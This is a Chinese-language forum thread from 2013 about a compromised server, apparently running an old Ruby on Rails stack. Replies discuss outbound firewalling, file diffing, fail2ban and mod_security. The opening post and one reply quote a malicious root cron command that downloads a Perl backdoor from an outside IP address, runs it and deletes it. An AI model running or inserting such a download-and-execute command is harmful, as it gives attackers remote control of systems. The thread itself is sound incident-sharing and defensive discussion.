系統被入侵 [論壇 - 伺服器架設]


正在瀏覽:   1 名遊客


 到底部   前一個主題   下一個主題  [無發表權] 請登錄或者註冊



系統被入侵
版主
註冊日期:
2008/7/14 0:03
來自 螢幕的另一端
所屬群組:
網站管理員
已註冊使用者
討論區管理群
等級: 32
HP : 0 / 798
MP : 497 / 26622
EXP: 95
離線
我的一台 server 被入侵了,在系統內部郵件裡我看到這樣的提示
From root@r2 Wed Nov 20 11:56:14 2013
Return-path: <root@r2>
Envelope-to: root@r2
Delivery-date: Wed, 20 Nov 2013 11:56:14 +0800
Received: from root by r2 with local (Exim 4.69)
        (envelope-from <root@r2>)
        id 1ViyOY-0004Eq-01
        for root@r2; Wed, 20 Nov 2013 11:56:14 +0800
From: root@r2 (Cron Daemon)
To: root@r2
Subject: Cron <root@r2> wget http://64.15.136.207/robot2.txt -O /tmp/robot2.txt;perl /tmp/robot2.txt;rm -rf /tmp/robot2.txt
Content-Type: text/plain; charset=UTF-8
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1ViyOY-0004Eq-01@r2>
Date: Wed, 20 Nov 2013 11:56:14 +0800

--2013-11-20 11:24:01--  http://64.15.136.207/robot2.txt
Connecting to 64.15.136.207:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17754 (17K) [text/plain]
Saving to: `/tmp/robot2.txt'

     0K .......... .......                                    100% 41.2K=0.4s

2013-11-20 11:24:02 (41.2 KB/s) - `/tmp/robot2.txt' saved [17754/17754]


嗯,這一行就可以很明顯的看出來我中招了
wget http://64.15.136.207/robot2.txt -O /tmp/robot2.txt;perl /tmp/robot2.txt;rm -rf /tmp/robot2.txt

這個程式就是後門,有沒有人有中招的經驗?
http://64.15.136.207/robot2.txt
我知道我的系統上太多的套件都太老舊了,有很多漏洞,系統該重做了。
目前是先補強安全性,再找時間重做系統。

貼出來只是經驗分享。

2013/12/12 16:36
應用擴展 工具箱
回覆: 系統被入侵
管理員
註冊日期:
2006/10/31 19:52
來自 Baker Street 221B
所屬群組:
網站管理員
已註冊使用者
討論區管理群
等級: 30
HP : 0 / 733
MP : 405 / 28092
EXP: 34
離線
不知道他用的是什麼漏洞?
為何它會去執行郵件主旨的指令?

2013/12/13 15:42
應用擴展 工具箱
回覆: 系統被入侵
會員二級
註冊日期:
2006/11/16 10:21
所屬群組:
已註冊使用者
等級: 5
HP : 0 / 114
MP : 15 / 4385
EXP: 59
離線
Cron <root@r2> wget http://64.15.136.207/robot2.txt -O /tmp/robot2.txt;perl /tmp/robot2.txt;rm -rf /tmp/robot2.txt

看起來cron有被塞東西

現在我比較重要的系統都定時diff唯讀的soure partition
有怪怪的東西就發mail通知

另外一般我們防火牆都只設外對內
其實內對外也很重要

像這篇如果有把內對外的80擋住
說不定還有救

2013/12/13 18:06
應用擴展 工具箱
回覆: 系統被入侵
版主
註冊日期:
2008/7/14 0:03
來自 螢幕的另一端
所屬群組:
網站管理員
已註冊使用者
討論區管理群
等級: 32
HP : 0 / 798
MP : 497 / 26622
EXP: 95
離線
那台是版本很舊的 ruby on rail
對外的80 port 的確沒有擋,現在已經擋上了

2013/12/14 17:26
應用擴展 工具箱
回覆: 系統被入侵
會員二級
註冊日期:
2006/12/28 8:08
所屬群組:
已註冊使用者
等級: 7
HP : 0 / 167
MP : 25 / 6348
EXP: 71
離線
網站的部份,最近覺得用fail2ban效果很好,分析apache的log,將一些奇怪的連線模式加到filter parttern中,符合pattern就會啟動iptable攔截對方ip。

2013/12/16 9:24
應用擴展 工具箱
回覆: 系統被入侵
會員二級
註冊日期:
2006/11/16 10:21
所屬群組:
已註冊使用者
等級: 5
HP : 0 / 114
MP : 15 / 4385
EXP: 59
離線
bruck 寫到:
網站的部份,最近覺得用fail2ban效果很好,分析apache的log,將一些奇怪的連線模式加到filter parttern中,符合pattern就會啟動iptable攔截對方ip。



感謝前輩分享

如果會寫rule的話
apache mod_security是一個很強大的IDS or IPS
http://www.modsecurity.org/

只是我研究了半天
目前只會套用範本
自己改規則常常會造成網站異常

另外我對SELinux也搞不太清楚
不知道有沒有前輩或板友對這塊有設略願意分享的

2013/12/16 9:40
應用擴展 工具箱
回覆: 系統被入侵
會員二級
註冊日期:
2006/12/28 8:08
所屬群組:
已註冊使用者
等級: 7
HP : 0 / 167
MP : 25 / 6348
EXP: 71
離線
我覺得fail2ban比其它方式好的地方在於,可以直接中斷供擊IP的連線一整天甚至到永遠,mod_security只能防止單一供擊行為,供擊者會一直用不同的供擊方式供擊,再多的防護都防不勝防。

2013/12/20 8:19
應用擴展 工具箱


 [無發表權] 請登錄或者註冊


可以查看帖子.
不可發帖.
不可回覆.
不可編輯自己的帖子.
不可刪除自己的帖子.
不可發起投票調查.
不可在投票調查中投票.
不可上傳附件.
不可不經審核直接發帖.